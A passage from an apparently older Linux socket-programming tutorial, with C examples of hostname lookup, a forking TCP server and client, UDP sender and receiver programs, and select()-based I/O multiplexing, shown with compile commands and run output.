    /* error check the command line */
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <domain_name>\n", argv[0]);
        exit(1);
    }

    /* get the host info */
    if ((h = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname(): ");
        exit(1);
    }
    else
        printf("gethostbyname() is OK.\n");

    printf("The host name is: %s\n", h->h_name);
    printf("The IP Address is: %s\n", inet_ntoa(*((struct in_addr *)h->h_addr)));
    printf("The address length is: %d\n", h->h_length);

    printf("Sniffing other names...sniff...sniff...sniff...\n");
    /* the alias list may be empty, so test before printing */
    int j = 0;
    while (h->h_aliases[j] != NULL) {
        printf("An alias #%d is: %s\n", j, h->h_aliases[j]);
        j++;
    }

    printf("Sniffing other IPs...sniff....sniff...sniff...\n");
    int i = 0;
    while (h->h_addr_list[i] != NULL) {
        printf("Address #%i is: %s\n", i, inet_ntoa(*((struct in_addr *)(h->h_addr_list[i]))));
        i++;
    }
    return 0;
}

Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g getipaddr.c -o getipaddr

Run the program. Because the server used in this testing has a public IP address, we can test it by querying a public domain such as www.yahoo.com.

[bodo@bakawali testsocket]$ ./getipaddr www.yahoo.com
The host name is: www.yahoo.akadns.net
The IP Address is: 66.94.230.50
The address length is: 4
Sniffing other names...sniff...sniff...sniff...
An alias #0 is: www.yahoo.com
Sniffing other IPs...sniff....sniff...sniff...
Address #0 is: 66.94.230.50
Address #1 is: 66.94.230.36
Address #2 is: 66.94.230.41
Address #3 is: 66.94.230.34
Address #4 is: 66.94.230.47
Address #5 is: 66.94.230.32
Address #6 is: 66.94.230.35
Address #7 is: 66.94.230.45

Again, running the program to test another domain.

[bodo@bakawali testsocket]$ ./getipaddr www.google.com
The host name is: www.l.google.com
The IP Address is: 66.102.7.104
The address length is: 4
Sniffing other names...sniff...sniff...sniff...
An alias #0 is: www.google.com
Sniffing other IPs...sniff....sniff...sniff...
Address #0 is: 66.102.7.104
Address #1 is: 66.102.7.99
Address #2 is: 66.102.7.147
[bodo@bakawali testsocket]$

With gethostbyname(), you can't use perror() to print the error message since errno is not used; call herror() instead. You simply pass the string that contains the machine name ("www.google.com") to gethostbyname(), and then grab the information out of the returned struct hostent.

The only possible weirdness might be in the printing of the IP address. Here, h->h_addr is a char *, but inet_ntoa() wants a struct in_addr passed to it. So we need to cast h->h_addr to a struct in_addr *, then dereference it to get the data.

Some Client-Server Background

Just about everything on the network deals with client processes talking to server processes and vice versa. Take telnet as an example. When you, as the client, telnet to a remote host on port 23, a program on that host, normally called telnetd (the telnet daemon), responds. It handles the incoming telnet connection, sets you up with a login prompt, etc. In Windows this daemon is normally called a service. The daemon or service must be running for the communication to take place.

Note that the client-server pair can communicate using SOCK_STREAM, SOCK_DGRAM, or anything else (as long as they're using the same protocol). Some good examples of client-server pairs are telnet/telnetd, ftp/ftpd, or bootp/bootpd. Every time you use ftp, there's a remote program, ftpd, that will serve you.

Often, there will only be one server, and that server will handle multiple clients using fork() etc. The basic routine is: the server waits for a connection, accept()s it and fork()s a child process to handle it. The following program example is what our sample server does.

A Simple Stream Server Program Example

What this server does is send the string "This is a test string from server!" out over a stream connection. To test this server, run it in one window and telnet to it from another window, or run it on a server and telnet to it from another machine with the following command.

telnet the_remote_hostname 3490

Where the_remote_hostname is the name of the machine you're running it on.
The following is the server source code:

/* serverprog.c - a stream socket server demo */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <signal.h>

/* the port users will be connecting to */
#define MYPORT 3490
/* how many pending connections queue will hold */
#define BACKLOG 10

void sigchld_handler(int s)
{
    /* reap every child that has already exited, without blocking */
    while(waitpid(-1, NULL, WNOHANG) > 0);
}

int main(int argc, char *argv[])
{
    /* listen on sockfd, new connection on new_fd */
    int sockfd, new_fd;
    /* my address information */
    struct sockaddr_in my_addr;
    /* connector's address information */
    struct sockaddr_in their_addr;
    /* accept() expects a socklen_t, not an int */
    socklen_t sin_size;
    struct sigaction sa;
    int yes = 1;
    /* the message sent to every client */
    const char *msg = "This is a test string from server!\n";

    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("Server-socket() error lol!");
        exit(1);
    }
    else
        printf("Server-socket() sockfd is OK...\n");

    if(setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
    {
        perror("Server-setsockopt() error lol!");
        exit(1);
    }
    else
        printf("Server-setsockopt() is OK...\n");

    /* host byte order */
    my_addr.sin_family = AF_INET;
    /* short, network byte order */
    my_addr.sin_port = htons(MYPORT);
    /* automatically fill with my IP */
    my_addr.sin_addr.s_addr = INADDR_ANY;
    printf("Server-Using %s and port %d...\n", inet_ntoa(my_addr.sin_addr), MYPORT);
    /* zero the rest of the struct */
    memset(&(my_addr.sin_zero), '\0', 8);

    if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
    {
        perror("Server-bind() error");
        exit(1);
    }
    else
        printf("Server-bind() is OK...\n");

    if(listen(sockfd, BACKLOG) == -1)
    {
        perror("Server-listen() error");
        exit(1);
    }
    printf("Server-listen() is OK...Listening...\n");

    /* clean all the dead processes */
    sa.sa_handler = sigchld_handler;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_RESTART;
    if(sigaction(SIGCHLD, &sa, NULL) == -1)
    {
        perror("Server-sigaction() error");
        exit(1);
    }
    else
        printf("Server-sigaction() is OK...\n");

    /* accept() loop */
    while(1)
    {
        sin_size = sizeof(struct sockaddr_in);
        if((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1)
        {
            perror("Server-accept() error");
            continue;
        }
        else
            printf("Server-accept() is OK...\n");
        printf("Server-new socket, new_fd is OK...\n");
        printf("Server: Got connection from %s\n", inet_ntoa(their_addr.sin_addr));

        /* this is the child process */
        if(!fork())
        {
            /* child doesn't need the listener */
            close(sockfd);
            /* send exactly the message bytes, no more */
            if(send(new_fd, msg, strlen(msg), 0) == -1)
                perror("Server-send() error lol!");
            close(new_fd);
            exit(0);
        }
        else
            /* parent: the child performs the actual send() */
            printf("Server-send() is OK...!\n");

        /* parent doesn't need this */
        close(new_fd);
        printf("Server-new socket, new_fd closed successfully...\n");
    }
    return 0;
}

Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g serverprog.c -o serverprog

Run the program, then suspend it with Ctrl+Z.

[bodo@bakawali testsocket]$ ./serverprog
Server-socket() sockfd is OK...
Server-setsockopt() is OK...
Server-Using 0.0.0.0 and port 3490...
Server-bind() is OK...
Server-listen() is OK...Listening...
Server-sigaction() is OK...

[1]+  Stopped                 ./serverprog
[bodo@bakawali testsocket]$

Resume the program in the background with bg. The verification steps that follow may also be done from another terminal.

[bodo@bakawali testsocket]$ bg
[1]+ ./serverprog &

Verify that the program/process is listening on the specified port, waiting for a connection.

[bodo@bakawali testsocket]$ netstat -a | grep 3490
tcp        0      0 *:3490                  *:*                     LISTEN

Again, verify that the program/process is running, waiting for a connection.

[bodo@bakawali testsocket]$ ps aux | grep serverprog
bodo      2586  0.0  0.2   2940   296 pts/3    S    14:04   0:00 ./serverprog
bodo      2590  0.0  0.5   5432   660 pts/3    R+   14:04   0:00 grep serverprog

Then, try telnet. Open another terminal and telnet to the same machine on the specified port number. Here we use the server name, bakawali. When the string is displayed, press the escape character Ctrl+] ( ^] ). Then we have a real telnet session.

[bodo@bakawali testsocket]$ telnet bakawali 3490
Trying 203.106.93.94...
Connected to bakawali.jmti.gov.my (203.106.93.94).
Escape character is '^]'.
This is the test string from server!
^]
telnet> ?
Commands may be abbreviated. Commands are:

close      close current connection
logout     forcibly logout remote user and close the connection
display    display operating parameters
mode       try to enter line or character mode ('mode ?' for more)
open       connect to a site
quit       exit telnet
send       transmit special characters ('send ?' for more)
set        set operating parameters ('set ?' for more)
unset      unset operating parameters ('unset ?' for more)
status     print status information
toggle     toggle operating parameters ('toggle ?' for more)
slc        change state of special charaters ('slc ?' for more)
auth       turn on (off) authentication ('auth ?' for more)
encrypt    turn on (off) encryption ('encrypt ?' for more)
forward    turn on (off) credential forwarding ('forward ?' for more)
z          suspend telnet
!          invoke a subshell
environ    change environment variables ('environ ?' for more)
?          print help information
telnet>

Type quit to exit the session.

...
telnet> quit
Connection closed.
[bodo@bakawali ~]$

If the server program/process was left running in the foreground (not suspended with Ctrl+Z), the following messages should be displayed at the server terminal. Press the Enter (carriage return) key to get back to the prompt.

[bodo@bakawali testsocket]$ ./serverprog
Server-socket() sockfd is OK...
Server-setsockopt() is OK...
Server-Using 0.0.0.0 and port 3490...
Server-bind() is OK...
Server-listen() is OK...Listening...
Server-sigaction() is OK...
Server-accept() is OK...
Server-new socket, new_fd is OK...
Server: Got connection from 203.106.93.94
Server-send() is OK...!
Server-new socket, new_fd closed successfully...

To stop the process, just issue a normal kill command. Before that, verify again.

[bodo@bakawali testsocket]$ netstat -a | grep 3490
tcp        0      0 *:3490                  *:*                     LISTEN
[bodo@bakawali testsocket]$ ps aux | grep ./serverprog
bodo      3184  0.0  0.2   1384   324 pts/3    S    23:46   0:00 ./serverprog
bodo      3188  0.0  0.5   3720   652 pts/3    R+   23:48   0:00 grep ./serverprog
[bodo@bakawali testsocket]$ kill -9 3184
[bodo@bakawali testsocket]$ netstat -a | grep 3490
[1]+  Killed                  ./serverprog
[bodo@bakawali testsocket]$

The server program seems OK. The next section presents a client program, clientprog.c, that we will use to test our server program, serverprog.c. The sigaction() code is responsible for cleaning up the zombie processes that the forked child processes leave behind when they exit. You will get the message from this server by using that client program.

NETWORK PROGRAMMING SOCKET PART 9 - CLIENT & SERVER PROGRAM EXAMPLES


The working program examples, if any, were compiled using gcc, tested using public IPs, and run as a normal user on Linux/Fedora Core 3 with several rounds of updates applied. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration.

A Simple Stream Client Program Example

This client will connect to the host that you specify on the command line, on port 3490. It will get the string that the previous server sends. The following is the source code.

/*** clientprog.c ****/
/*** a stream socket client demo ***/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

// the port client will be connecting to
#define PORT 3490
// max number of bytes we can get at once
#define MAXDATASIZE 300

int main(int argc, char *argv[])
{
    int sockfd, numbytes;
    char buf[MAXDATASIZE];
    struct hostent *he;
    // connector's address information
    struct sockaddr_in their_addr;

    // if no command line argument supplied
    if(argc != 2)
    {
        fprintf(stderr, "Client-Usage: %s the_client_hostname\n", argv[0]);
        // just exit
        exit(1);
    }

    // get the host info
    if((he = gethostbyname(argv[1])) == NULL)
    {
        // gethostbyname() sets h_errno, not errno, so use herror()
        herror("gethostbyname()");
        exit(1);
    }
    else
        printf("Client-The remote host is: %s\n", argv[1]);

    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("socket()");
        exit(1);
    }
    else
        printf("Client-The socket() sockfd is OK...\n");

    // host byte order
    their_addr.sin_family = AF_INET;
    // short, network byte order
    printf("Server-Using %s and port %d...\n", argv[1], PORT);
    their_addr.sin_port = htons(PORT);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    // zero the rest of the struct
    memset(&(their_addr.sin_zero), '\0', 8);

    if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
        perror("connect()");
        exit(1);
    }
    else
        printf("Client-The connect() is OK...\n");

    if((numbytes = recv(sockfd, buf, MAXDATASIZE-1, 0)) == -1)
    {
        perror("recv()");
        exit(1);
    }
    else
        printf("Client-The recv() is OK...\n");

    buf[numbytes] = '\0';
    printf("Client-Received: %s", buf);

    printf("Client-Closing sockfd\n");
    close(sockfd);
    return 0;
}

Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g clientprog.c -o clientprog

Run the program without an argument.

[bodo@bakawali testsocket]$ ./clientprog
Client-Usage: ./clientprog the_client_hostname

Run the program with the server IP address or name as an argument. Make sure your previous serverprog program is running. We connect to the same machine here, first using the IP address and then the name. You can also try running the server and client programs on different machines.

[bodo@bakawali testsocket]$ ./clientprog 203.106.93.94
...
[bodo@bakawali testsocket]$ ./clientprog bakawali
Client-The remote host is: bakawali
Client-The socket() sockfd is OK...
Server-Using bakawali and port 3490...
Client-The connect() is OK...
Client-The recv() is OK...
Client-Received: This is the test string from server!
Client-Closing sockfd

Verify the connection.

[bodo@bakawali testsocket]$ netstat -a | grep 3490
tcp        0      0 *:3490                     *:*                        LISTEN
tcp        0      0 bakawali.jmti.gov.my:3490  bakawali.jmti.gov.my:1358  TIME_WAIT
[bodo@bakawali testsocket]$

At the server's console, we have the following messages.

[bodo@bakawali testsocket]$ ./serverprog
Server-socket() sockfd is OK...
Server-setsockopt() is OK...
Server-Using 0.0.0.0 and port 3490...
Server-bind() is OK...
Server-listen() is OK...Listening...
Server-sigaction() is OK...
Server-accept() is OK...
Server-new socket, new_fd is OK...
Server: Got connection from 203.106.93.94
Server-send() is OK...!
Server-new socket, new_fd closed successfully...

Well, our server and client programs work! Here we ran the server program and let it listen for connections. Then we ran the client program. They got connected! Notice that if you don't run the server before you run the client, connect() fails with a "Connection refused" error, as shown below.

[bodo@bakawali testsocket]$ ./clientprog bakawali
Client-The remote host is: bakawali
Client-The socket() sockfd is OK...
Server-Using bakawali and port 3490...
connect: Connection refused

Datagram Sockets: The Connectionless

The following program examples use UDP, the connectionless datagram protocol. senderprog.c (the client) sends a message to receiverprog.c (the server), which acts as the listener.

/*receiverprog.c - a server, datagram sockets*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* the port users will be connecting to */
#define MYPORT 4950
#define MAXBUFLEN 500

int main(int argc, char *argv[])
{
    int sockfd;
    /* my address information */
    struct sockaddr_in my_addr;
    /* connector's address information */
    struct sockaddr_in their_addr;
    /* recvfrom() expects a socklen_t, not an int */
    socklen_t addr_len;
    int numbytes;
    char buf[MAXBUFLEN];

    if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
    {
        perror("Server-socket() sockfd error lol!");
        exit(1);
    }
    else
        printf("Server-socket() sockfd is OK...\n");

    /* host byte order */
    my_addr.sin_family = AF_INET;
    /* short, network byte order */
    my_addr.sin_port = htons(MYPORT);
    /* automatically fill with my IP */
    my_addr.sin_addr.s_addr = INADDR_ANY;
    /* zero the rest of the struct */
    memset(&(my_addr.sin_zero), '\0', 8);

    if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
    {
        perror("Server-bind() error lol!");
        exit(1);
    }
    else
        printf("Server-bind() is OK...\n");

    addr_len = sizeof(struct sockaddr);
    /* blocks here until a datagram arrives */
    if((numbytes = recvfrom(sockfd, buf, MAXBUFLEN-1, 0, (struct sockaddr *)&their_addr, &addr_len)) == -1)
    {
        perror("Server-recvfrom() error lol!");
        /* If something wrong, just exit lol... */
        exit(1);
    }
    else
    {
        printf("Server-Waiting and listening...\n");
        printf("Server-recvfrom() is OK...\n");
    }

    printf("Server-Got packet from %s\n", inet_ntoa(their_addr.sin_addr));
    printf("Server-Packet is %d bytes long\n", numbytes);
    buf[numbytes] = '\0';
    printf("Server-Packet contains \"%s\"\n", buf);

    if(close(sockfd) != 0)
        printf("Server-sockfd closing failed!\n");
    else
        printf("Server-sockfd successfully closed!\n");
    return 0;
}

Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g receiverprog.c -o receiverprog

Run the program, put it in the background, and then verify that it is waiting for a datagram on the port.

[bodo@bakawali testsocket]$ ./receiverprog
Server-socket() sockfd is OK...
Server-bind() is OK...

[1]+  Stopped                 ./receiverprog
[bodo@bakawali testsocket]$ bg
[1]+ ./receiverprog &
[bodo@bakawali testsocket]$ netstat -a | grep 4950
udp        0      0 *:4950                  *:*

[bodo@bakawali testsocket]$

This is a UDP server, so trying to telnet to it will fail, because telnet uses TCP instead of UDP.

[bodo@bakawali testsocket]$ telnet 203.106.93.94 4950
Trying 203.106.93.94...
telnet: connect to address 203.106.93.94: Connection refused
telnet: Unable to connect to remote host: Connection refused
[bodo@bakawali testsocket]$

Notice that in our call to socket() we're using SOCK_DGRAM. Also, note that there's no need to listen() or accept(). The following is the source code for senderprog.c (the client).

/*senderprog.c - a client, datagram*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* the port users will be connecting to */
#define MYPORT 4950

int main(int argc, char *argv[])
{
    int sockfd;
    /* connector's address information */
    struct sockaddr_in their_addr;
    struct hostent *he;
    int numbytes;

    if(argc != 3)
    {
        fprintf(stderr, "Client-Usage: %s <hostname> <message>\n", argv[0]);
        exit(1);
    }

    /* get the host info */
    if((he = gethostbyname(argv[1])) == NULL)
    {
        /* gethostbyname() sets h_errno, not errno, so use herror() */
        herror("Client-gethostbyname() error lol!");
        exit(1);
    }
    else
        printf("Client-gethostname() is OK...\n");

    if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
    {
        perror("Client-socket() error lol!");
        exit(1);
    }
    else
        printf("Client-socket() sockfd is OK...\n");

    /* host byte order */
    their_addr.sin_family = AF_INET;
    /* short, network byte order */
    printf("Using port: 4950\n");
    their_addr.sin_port = htons(MYPORT);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    /* zero the rest of the struct */
    memset(&(their_addr.sin_zero), '\0', 8);

    if((numbytes = sendto(sockfd, argv[2], strlen(argv[2]), 0, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == -1)
    {
        perror("Client-sendto() error lol!");
        exit(1);
    }
    else
        printf("Client-sendto() is OK...\n");

    printf("sent %d bytes to %s\n", numbytes, inet_ntoa(their_addr.sin_addr));

    if(close(sockfd) != 0)
        printf("Client-sockfd closing is failed!\n");
    else
        printf("Client-sockfd successfully closed!\n");
    return 0;
}

Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g senderprog.c -o senderprog

Run the program without arguments.

[bodo@bakawali testsocket]$ ./senderprog
Client-Usage: ./senderprog <hostname> <message>

Run the program with arguments. Because receiverprog is running in the background of the same terminal, its messages are interleaved with the client's.

[bodo@bakawali testsocket]$ ./senderprog 203.106.93.94 "Testing UDP datagram message from client"
Client-gethostname() is OK...
Client-socket() sockfd is OK...
Using port: 4950
Server-Waiting and listening...
Server-recvfrom() is OK...
Server-Got packet from 203.106.93.94
Server-Packet is 42 bytes long
Server-Packet contains "Testing UDP datagram message from client"
Server-sockfd successfully closed!
Client-sendto() is OK...
sent 42 bytes to 203.106.93.94
Client-sockfd successfully closed!
[1]+  Done                    ./receiverprog
[bodo@bakawali testsocket]$

Here, we test the UDP server and the client on the same machine. Make sure there are no restrictions, such as permissions, on the user that runs the programs. To make the test more realistic, you can run receiverprog on one machine and senderprog on another. If there is no error, they should communicate.

If senderprog calls connect() and specifies receiverprog's address, then senderprog may only send to and receive from the address specified by connect(). For this reason, you don't have to use sendto() and recvfrom(); you can simply use send() and recv().

Blocking

Put simply, to 'block' means to sleep in a standby state until something happens. You probably noticed that when you ran receiverprog previously, it just sat there until a packet arrived. What happened is that it called recvfrom(), there was no data, and so recvfrom() is said to "block" (that is, sleep there) until some data arrives. The socket functions which can block are:

1. accept()
2. read()
3. readv()
4. recv()
5. recvfrom()
6. recvmsg()
7. send()
8. sendmsg()
9. sendto()
10. write()
11. writev()

The reason they can do this is that they're allowed to. When you first create the socket descriptor with socket(), the kernel sets it to blocking. If you don't want a socket to be blocking, you have to make a call to fcntl(), something like the following:

#include <unistd.h>
#include <fcntl.h>
...
...
sockfd = socket(AF_INET, SOCK_STREAM, 0);
fcntl(sockfd, F_SETFL, O_NONBLOCK);
...
...

By setting a socket to non-blocking, you can effectively 'poll' the socket for information. If you try to read from a non-blocking socket and there's no data there, it's not allowed to block; it will return -1 and errno will be set to EWOULDBLOCK (EAGAIN on some systems; on Linux the two have the same value). Generally speaking, however, this type of polling is a bad idea. If you put your program in a busy-wait looking for data on the socket, you'll suck up CPU time. A more elegant solution for checking to see if there's data waiting to be read comes in the following section on select().
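To make the "would block" case concrete, here is a minimal sketch of a non-blocking read. It assumes two hypothetical helpers, set_nonblocking() and try_recv(), which are not part of the sockets API. Unlike the short fcntl() fragment shown earlier, set_nonblocking() first reads the current flags with F_GETFL so that other flags on the descriptor are preserved.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

/* set_nonblocking() and try_recv() are hypothetical helper names. */

/* Add O_NONBLOCK to the descriptor's existing flags.
 * Returns 0 on success, -1 on error. */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);

    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFL, flags | O_NONBLOCK) == -1 ? -1 : 0;
}

/* Try to read without sleeping.
 * Returns the number of bytes read, -1 on a real error,
 * or -2 when there is simply nothing to read yet. */
ssize_t try_recv(int fd, void *buf, size_t len)
{
    ssize_t n = recv(fd, buf, len, 0);

    if (n == -1 && (errno == EAGAIN || errno == EWOULDBLOCK))
        return -2;      /* no data right now, not a failure */
    return n;
}
```

Calling try_recv() in a tight loop is exactly the busy-wait that the text warns about, so the -2 result is best treated as a cue to go and do other work.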

Using select() for I/O multiplexing

One traditional way to write network servers is to have the main server block on accept(), waiting for a connection. Once a connection comes in, the server forks; the child process handles the connection and the main server is able to service new incoming requests. With select(), instead of having a process for each request, there is usually only one process that multiplexes all requests, servicing each request as much as it can.

So one main advantage of using select() is that your server requires only a single process to handle all requests. Thus, your server will not need shared memory or synchronization primitives for different tasks to communicate. As discussed before, we could use non-blocking socket functions instead, but polling them is CPU intensive.

One major disadvantage of using select() is that your server cannot act as if there's only one client, as it can with a forking solution. For example, with a forking solution, after the server forks, the child process works with the client as if there were only one client in the universe; the child does not have to worry about new incoming connections or the existence of other sockets. With select(), the programming isn't as transparent. The prototype is as follows:

#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

int select(int numfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, struct timeval *timeout);

The function monitors "sets" of file descriptors; in particular readfds, writefds, and exceptfds. If you want to see if you can read from standard input and some socket descriptor, sockfd, just add the file descriptors 0 and sockfd to the set readfds.

The parameter numfds should be set to the value of the highest file descriptor plus one. In this example, it should be set to sockfd+1, since sockfd is assuredly higher than standard input, which is 0. When select() returns, readfds will have been modified to reflect which of the file descriptors you selected are ready for reading. You can test them with the macro FD_ISSET() listed below. Let's see how to manipulate these sets. Each set is of the type fd_set. The following macros operate on this type:

1. FD_ZERO(fd_set *set) clears a file descriptor set.
2. FD_SET(int fd, fd_set *set) adds fd to the set.
3. FD_CLR(int fd, fd_set *set) removes fd from the set.
4. FD_ISSET(int fd, fd_set *set) tests to see if fd is in the set.

select() works by blocking until something happens on a file descriptor/socket. The 'something' is data coming in or the descriptor becoming writable; you tell select() what you want to be woken up by. How do you tell it? You fill up an fd_set structure with some macros. Most select()-based servers look quite similar:

1. Fill up an fd_set structure with the file descriptors on which you want to know when data comes in.
2. Fill up an fd_set structure with the file descriptors on which you want to know when you can write.
3. Call select() and block until something happens.
4. Once select() returns, check to see if any of your file descriptors was the reason you woke up. If so, 'service' that file descriptor in whatever particular way your server needs to (e.g. read in a request for a Web page).
5. Repeat this process forever.
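The fill, call and check steps above can be sketched for a single descriptor as follows. The helper name wait_readable() and its return convention are assumptions made for this illustration; a real server would put several descriptors in the set and loop.

```c
#include <sys/select.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/* wait_readable() is a hypothetical helper.
 * Returns 1 if fd became readable within the timeout,
 * 0 if the timeout expired first, and -1 on error. */
int wait_readable(int fd, long seconds, long microseconds)
{
    fd_set readfds;
    struct timeval tv;
    int ready;

    /* step 1: fill the set with the descriptor we care about */
    FD_ZERO(&readfds);
    FD_SET(fd, &readfds);

    tv.tv_sec = seconds;
    tv.tv_usec = microseconds;

    /* step 3: numfds is the highest descriptor plus one */
    ready = select(fd + 1, &readfds, NULL, NULL, &tv);
    if (ready == -1)
        return -1;

    /* step 4: select() has rewritten the set; test our descriptor */
    return FD_ISSET(fd, &readfds) ? 1 : 0;
}
```

For example, wait_readable(sockfd, 2, 500000) would wait up to 2.5 seconds for data on sockfd.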

Sometimes you don't want to wait forever for someone to send you some data. Maybe every 60 seconds you want to print something like "Processing..." to the terminal even though nothing has happened. The timeval structure allows you to specify a timeout period. If the time is exceeded and select() still hasn't found any ready file descriptors, it'll return, so you can continue processing. The struct timeval has the following fields:

struct timeval
{
    time_t      tv_sec;  /* seconds */
    suseconds_t tv_usec; /* microseconds */
};

Just set tv_sec to the number of seconds to wait, and set tv_usec to the number of microseconds to wait. There are 1,000,000 microseconds in a second. Also, when the function returns, timeout might be updated to show the time still remaining. The wait is not exact: the timeout is rounded up to the granularity of the system clock and scheduling delays can add to it, so on a system with a time slice of around 100 milliseconds you might have to wait that long no matter how small you set your struct timeval.
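Since timeouts are often given in milliseconds, the split into seconds and microseconds can be written as a small conversion. The function name ms_to_timeval() is an assumption used only for this sketch, and treating negative input as zero is a design choice of the sketch, not something select() requires.

```c
#include <sys/time.h>

/* ms_to_timeval() is a hypothetical helper that splits a timeout in
 * milliseconds into the two fields of struct timeval.
 * Negative input is treated as zero. */
struct timeval ms_to_timeval(long ms)
{
    struct timeval tv;

    if (ms < 0)
        ms = 0;
    tv.tv_sec = ms / 1000;             /* whole seconds */
    tv.tv_usec = (ms % 1000) * 1000;   /* remainder, in microseconds */
    return tv;
}
```

With this, a 5.8 second wait is ms_to_timeval(5800), which gives tv_sec = 5 and tv_usec = 800000.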

If you set the fields in your struct timeval to 0, select() will time out immediately, effectively polling all the file descriptors in your sets. If you set the parameter timeout to NULL, it will never time out, and will wait until the first file descriptor is ready. Finally, if you don't care about waiting for a certain set, you can just set it to NULL in the call to select(). The following code snippet waits 5.8 seconds for something to appear on standard input.

/*selectcp.c - a select() demo*/
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/* file descriptor for standard input */
#define STDIN 0

int main(int argc, char *argv[])
{
    struct timeval tval;
    fd_set readfds;

    tval.tv_sec = 5;
    tval.tv_usec = 800000;

    FD_ZERO(&readfds);
    FD_SET(STDIN, &readfds);

    /* don't care about writefds and exceptfds: */
    select(STDIN+1, &readfds, NULL, NULL, &tval);

    if(FD_ISSET(STDIN, &readfds))
        printf("A key was pressed lor!\n");
    else
        printf("Timed out lor!...\n");
    return 0;
}

Compile and link the program. Make sure there is no error :o).

[bodo@bakawali testsocket]$ gcc -g selectcp.c -o selectcp

Run the program and then press k.

[bodo@bakawali testsocket]$ ./selectcp
k
A key was pressed lor!

Run the program and just leave it.

[bodo@bakawali testsocket]$ ./selectcp
Timed out lor!...

If you're on a line-buffered terminal, the key you hit should be RETURN or it will time out anyway. Now, some of you might think this is a great way to wait for data on a datagram socket, and you are right: it might be. Some Unices can use select() in this manner, and some can't. You should see what your local man page says on the matter if you want to attempt it.

Some Unices update the time in your struct timeval to reflect the amount of time still remaining before a timeout. But others do not. Don't rely on that occurring if you want to be portable. Use gettimeofday() if you need to track time elapsed.

When a socket in the read set closes the connection, select() returns with that socket descriptor set as "ready to read". When you actually do recv() from it, recv() will return 0. That's how you know the client has closed the connection. If you have a socket that is listen()ing, you can check to see if there is a new connection by putting that socket's file descriptor in the readfds set.
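The "readable, but recv() returns 0" rule can be checked without consuming any data. In the sketch below, peer_has_closed() is a hypothetical helper, and the use of MSG_PEEK (so that a pending byte stays in the queue for the real read) is an addition of this sketch rather than something the text above prescribes.

```c
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/* peer_has_closed() is a hypothetical helper for a stream socket.
 * Returns 1 if the peer has closed the connection, 0 if the
 * connection is still open (with or without pending data),
 * and -1 on error. */
int peer_has_closed(int fd)
{
    fd_set readfds;
    struct timeval tv;
    char byte;
    ssize_t n;

    FD_ZERO(&readfds);
    FD_SET(fd, &readfds);
    tv.tv_sec = 0;              /* zero timeout: poll, never sleep */
    tv.tv_usec = 0;

    if (select(fd + 1, &readfds, NULL, NULL, &tv) == -1)
        return -1;
    if (!FD_ISSET(fd, &readfds))
        return 0;               /* nothing to read, so not closed */

    /* readable: peek at one byte without removing it from the queue */
    n = recv(fd, &byte, 1, MSG_PEEK);
    if (n == -1)
        return -1;
    return n == 0 ? 1 : 0;      /* 0 bytes on a readable socket = closed */
}
```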

NETWORK PROGRAMMING SOCKET PART 10 - MORE TCP & UDP CLIENT & SERVER PROGRAM EXAMPLES
This is a continuation from the Part II series, Socket Part 9. The working program examples, if any, were compiled using gcc, tested using public IPs, and run as a normal user on Linux Fedora 3 with several rounds of updates applied. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration. All the program examples are generic. Beware of code statements that span more than one line. Have a nice ride lol!

This module covers the following sub-topics:

Example: The select() server

Connecting a TCP server and client:
1. Example: Connecting a TCP server to a client, a server program
2. Example: Connecting a TCP client to a server, a client program

UDP connectionless client/server

Connecting a UDP server and client:
1. Example: Connecting a UDP server to a client, a server program
2. Example: Connecting a UDP client to a server, a client program

Connection-oriented server designs:
1. Iterative server
2. spawn() server and spawn() worker
3. sendmsg() server and recvmsg() worker
4. Multiple accept() servers and multiple accept() workers
5. Example: Writing an iterative server program
6. Example: Connection-oriented common client
7. Example: Sending and receiving a multicast datagram
8. Example: Sending a multicast datagram, a server program
